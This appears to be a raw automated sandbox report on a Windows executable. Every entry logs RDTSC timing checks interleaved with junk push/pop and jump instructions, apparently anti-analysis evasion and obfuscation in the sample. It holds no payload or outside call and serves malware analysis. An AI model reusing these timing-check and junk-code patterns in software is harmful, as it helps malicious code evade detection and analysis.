Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88269 second address: D882C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2BDC8ABB16h 0x0000000a pop esi 0x0000000b jmp 00007F2BDC8ABB22h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDC8ABB24h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2BDC8ABB24h 0x00000020 jmp 00007F2BDC8ABB25h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D882C9 second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88DF3 second address: D88DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890C8 second address: D890D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2BDCD5A7A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890D6 second address: D890DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890DC second address: D890EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDCD5A7A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890EA second address: D89104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89104 second address: D8911D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2BDCD5A7B0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8911D second address: D89123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89123 second address: D89129 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D548 second address: D8D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D54D second address: D8D552 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D552 second address: D8D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D55D second address: D8D563 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8C92B second address: D8C94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F2BDC8ABB16h 0x0000000b jmp 00007F2BDC8ABB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CAAA second address: D8CAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CAB0 second address: D8CABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CABA second address: D8CABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC36 second address: D8CC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC3A second address: D8CC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC40 second address: D8CC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2BDC8ABB1Fh 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007F2BDC8ABB28h 0x00000013 jmp 00007F2BDC8ABB22h 0x00000018 jp 00007F2BDC8ABB2Bh 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CDE0 second address: D8CDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F2BDCD5A7A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CDEC second address: D8CDF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF75 second address: D8CF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF7D second address: D8CF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F2BDC8ABB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF8A second address: D8CF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F0 second address: D8D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F4 second address: D8D0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F8 second address: D8D100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D100 second address: D8D105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D91D92 second address: D91DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jns 00007F2BDC8ABB16h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D978D7 second address: D978E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2BDCD5A7AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D978E3 second address: D97905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D97AD1 second address: D97AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D97AD5 second address: D97ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D980C5 second address: D980CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D980CB second address: D980EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9837A second address: D98380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9863B second address: D9865D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2BDC8ABB28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9865D second address: D98661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D987EB second address: D987EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996D6 second address: D996DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996DF second address: D996E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996E5 second address: D996F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F2BDCD5A7A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996F2 second address: D99704 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2BDC8ABB1Ch 0x00000008 je 00007F2BDC8ABB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D99704 second address: D9971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0A8E second address: DA0A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0A93 second address: DA0AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2BDCD5A7B0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BE6 second address: DA0BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BEA second address: DA0BF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDCD5A7B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BF4 second address: DA0BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BFA second address: DA0C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F74 second address: DB0F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F79 second address: DB0F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F94 second address: DB0FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2BDC8ABB16h 0x0000000d jmp 00007F2BDC8ABB1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0B37 second address: DB0B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2BDCD5A7ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0B43 second address: DB0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2F52 second address: DB2F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2F56 second address: DB2F86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F2BDC8ABB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007F2BDC8ABB1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F2BDC8ABB16h 0x0000001b jmp 00007F2BDC8ABB1Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2C63 second address: DB2C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8604 second address: DB8608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8608 second address: DB8613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2BDCD5A7A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8613 second address: DB8631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F2BDC8ABB1Fh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCAA30 second address: DCAA4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2BDCD5A7B3h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9383 second address: DC9389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9389 second address: DC938D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D00 second address: DC9D0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2BDC8ABB16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D0C second address: DC9D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D11 second address: DC9D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCA6C9 second address: DCA714 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2BDCD5A7B8h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jnp 00007F2BDCD5A7A6h 0x0000001b pop edx 0x0000001c pushad 0x0000001d jo 00007F2BDCD5A7A6h 0x00000023 jmp 00007F2BDCD5A7B2h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCD3B4 second address: DCD3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCD3BC second address: DCD3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCD53A second address: DCD565 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2BDC8ABB2Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F2BDC8ABB18h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCD565 second address: DCD569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E04F00 second address: E04F12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDC8ABB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E0E5E3 second address: E0E5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E0E5E7 second address: E0E5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E10BF3 second address: E10C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2BDCD5A7B8h 0x0000000d jmp 00007F2BDCD5A7AEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E10C28 second address: E10C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E10C2C second address: E10C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E13196 second address: E1319A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E1319A second address: E131A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E131A0 second address: E131A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E13005 second address: E13019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7AEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E13019 second address: E1301D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E1301D second address: E1302A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E20851 second address: E20855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E20855 second address: E2089D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B0h 0x00000007 jmp 00007F2BDCD5A7B3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2BDCD5A7B9h 0x00000015 jbe 00007F2BDCD5A7A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E2089D second address: E208BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2BDC8ABB16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2BDC8ABB24h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E20525 second address: E2052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: E2052D second address: E20532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE58F9 second address: EE58FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE58FE second address: EE591F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F2BDC8ABB1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F2BDC8ABB28h 0x00000014 je 00007F2BDC8ABB22h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE591F second address: EE5925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE503E second address: EE5075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 popad 0x0000000a jmp 00007F2BDC8ABB24h 0x0000000f jbe 00007F2BDC8ABB18h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE5075 second address: EE5079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE537D second address: EE5381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: EE5381 second address: EE5385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
